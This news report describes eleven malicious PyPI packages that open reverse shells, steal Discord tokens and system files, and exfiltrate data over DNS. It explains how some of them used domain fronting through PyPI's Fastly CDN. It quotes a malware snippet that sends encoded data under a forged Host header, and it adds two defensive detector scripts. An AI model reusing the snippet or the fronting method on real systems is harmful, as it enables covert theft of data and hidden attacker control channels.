Malicious libraries found in the PyPI repository that use the PyPI CDN to hide their communication channel

Eleven packages containing malicious code have been identified in the PyPI (Python Package Index) repository. Before the problem was spotted, the packages had been downloaded about 38 thousand times in total. The malicious packages stand out for using sophisticated techniques to hide the communication channels to the attackers' servers.

  • important-package (6305 downloads), important_package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org, in order to provide shell access to the system (reverse shell) over that channel.
  • pptest (10001), ipboards (946) - used DNS as the communication channel to transmit information about the system (the first package: hostname, working directory, internal and external IP; the second: username and hostname).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord service token on the system and sent it to an external host.
  • trrfab (287) - sent the identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message that the system had been compromised and redirected to a page with additional information about further actions, published via nda.ya.ru (api.ya.cc).

Of particular note is the method of reaching the external host used in the important-package and important_package packages, which abused the Fastly content delivery network serving the PyPI index to disguise their activity. The requests were in fact sent to the pypi.python.org server (including the name python.org in the SNI of the HTTPS request), but the HTTP "Host" header carried the name of a server controlled by the attackers (psc.forward.io.global.prod.fastly.net). The content delivery network forwarded an equivalent request to the attackers' server, while the data travelled inside a TLS connection negotiated with the parameters of pypi.python.org.

PyPI's infrastructure runs on the Fastly content delivery network, which uses the Varnish transparent proxy to cache typical requests and terminates TLS with certificates at the CDN level rather than on the end servers, so that HTTPS requests are relayed through the proxy. Whatever the target host, requests arrive at the proxy, which determines the desired host from the HTTP "Host" header; the hosts' domain names resolve to the CDN load balancer IP addresses shared by all Fastly customers.

The attackers' server was also registered with the Fastly CDN, which offers free plans to anyone and even allows anonymous sign-up. Notably, the same scheme was used for the requests sent to the victim when setting up the "reverse shell", only initiated from the attackers' host. From the outside, the interaction with the attackers' server looks like a legitimate session with the PyPI repository, encrypted under the PyPI TLS certificate. A similar technique, known as "domain fronting", has long been actively used to hide the hostname when bypassing blocking: it relies on the ability, offered by some CDNs, to access HTTPS while presenting a decoy host in the SNI and actually passing the requested hostname in the HTTP Host header inside the TLS session.


To disguise the malicious activity, the TrevorC2 package was also used to make the interaction with the server resemble ordinary web browsing: for example, malicious requests were sent under the guise of downloading the image "https://pypi.python.org/images?guid=", with the data encoded in the guid parameter.

    from urllib import request

    # b64_payload holds the base64-encoded data to be smuggled in the guid parameter
    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    r = request.Request(url, headers = {'Host': "psc.forward.io.global.prod.fastly.net"})
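As an added illustration (not from the original article and not code from the packages), the following Python detector flags the mismatch the text describes: requests whose TLS SNI names pypi.python.org while the HTTP Host header names a different registrable domain. The log format and sample lines are constructed.

```python
# Added example (not from the original article): flag HTTPS requests whose
# TLS SNI and HTTP Host header disagree, the signature of the domain-fronting
# trick described above. Log format and sample lines are constructed.

def registrable(host: str) -> str:
    """Crude eTLD+1: last two labels (sufficient for these samples)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def parse_line(line: str) -> dict:
    """Constructed format: '<ts> sni=<sni> host=<host> path=<path>'."""
    return dict(kv.split("=", 1) for kv in line.split()[1:])

def find_fronting(lines):
    """Return (sni, host, path) for requests whose Host header points at a
    different registrable domain than the SNI presented in the TLS handshake."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        fields = parse_line(line)
        sni, host = fields.get("sni", ""), fields.get("host", "")
        if sni and host and registrable(sni) != registrable(host):
            hits.append((sni, host, fields.get("path", "")))
    return hits

# Constructed sample: two ordinary package-index fetches and one request that
# fronts pypi.python.org while the Host header names a Fastly backend.
SAMPLE_LOG = """\
2021-11-18T10:00:01Z sni=pypi.python.org host=pypi.python.org path=/simple/requests/
2021-11-18T10:00:02Z sni=pypi.python.org host=psc.forward.io.global.prod.fastly.net path=/images?guid=aGVsbG8=
2021-11-18T10:00:03Z sni=files.pythonhosted.org host=files.pythonhosted.org path=/packages/x.whl
"""

if __name__ == "__main__":
    for sni, host, path in find_fronting(SAMPLE_LOG.splitlines()):
        print(f"SNI/Host mismatch: sni={sni} host={host} path={path}")
```

The same check applies to any TLS-terminating proxy or passive sensor that logs both the SNI and the decrypted Host header.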

The pptest and ipboards packages used a different approach to hide network activity, based on encoding the harvested information in queries to a DNS server. The malware transmits information by issuing DNS requests such as "nu4timjagq4fimbuhe.example.com", in which the data sent to the control server is encoded in base64 form in the subdomain name. The attacker receives these messages by controlling the DNS server for the example.com domain.
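As an added illustration (not from the original article and not code from the packages), this Python detector looks for the pattern just described in DNS query logs: a long leftmost label that either decodes from padding-stripped base64 to readable text or is high-entropy. The log format, the client address and the "bob@dev-01" payload are constructed; the query name nu4timjagq4fimbuhe.example.com is the one quoted in the text.

```python
# Added example (not from the original article): flag DNS queries whose
# leftmost label looks like an encoded payload, the exfiltration pattern used
# by pptest/ipboards. Log format and sample lines are constructed.
import base64
import math

def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def try_b64(label: str):
    """Decode a padding-stripped base64 (standard or URL-safe) label;
    return printable ASCII text, or None if it is not such a payload."""
    padded = label.replace("+", "-").replace("/", "_") + "=" * (-len(label) % 4)
    try:
        text = base64.urlsafe_b64decode(padded).decode("ascii")
    except ValueError:          # binascii.Error and UnicodeDecodeError both derive from it
        return None
    return text if text.isprintable() else None

def suspicious_queries(lines, min_len=12, min_entropy=3.0):
    """Return queries whose first label either decodes to readable text or
    is long and high-entropy (encoded, but not recoverable as ASCII)."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()   # constructed format
        label = qname.split(".")[0]               # payload rides in the leftmost label
        if len(label) < min_len:
            continue
        decoded, ent = try_b64(label), entropy(label)
        if decoded is not None or ent >= min_entropy:
            hits.append({"ts": ts, "client": client, "qname": qname,
                         "decoded": decoded, "entropy": round(ent, 2)})
    return hits

# Constructed sample: a payload label built the way the text describes
# (base64 of system info, padding dropped), alongside the query quoted above.
EXFIL_LABEL = base64.urlsafe_b64encode(b"bob@dev-01").decode().rstrip("=")
EXFIL_QNAME = EXFIL_LABEL + ".example.com"
SAMPLE_LOG = f"""\
2021-11-18T10:00:01Z 10.0.0.5 www.example.com A
2021-11-18T10:00:02Z 10.0.0.5 nu4timjagq4fimbuhe.example.com A
2021-11-18T10:00:03Z 10.0.0.5 files.pythonhosted.org A
2021-11-18T10:00:04Z 10.0.0.5 {EXFIL_QNAME} TXT
"""
```

Thresholds are heuristics: long, high-entropy labels also occur in legitimate CDN and tracking hostnames, so in practice the hits are reviewed per domain and per client query rate.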

Source: opennet.ru
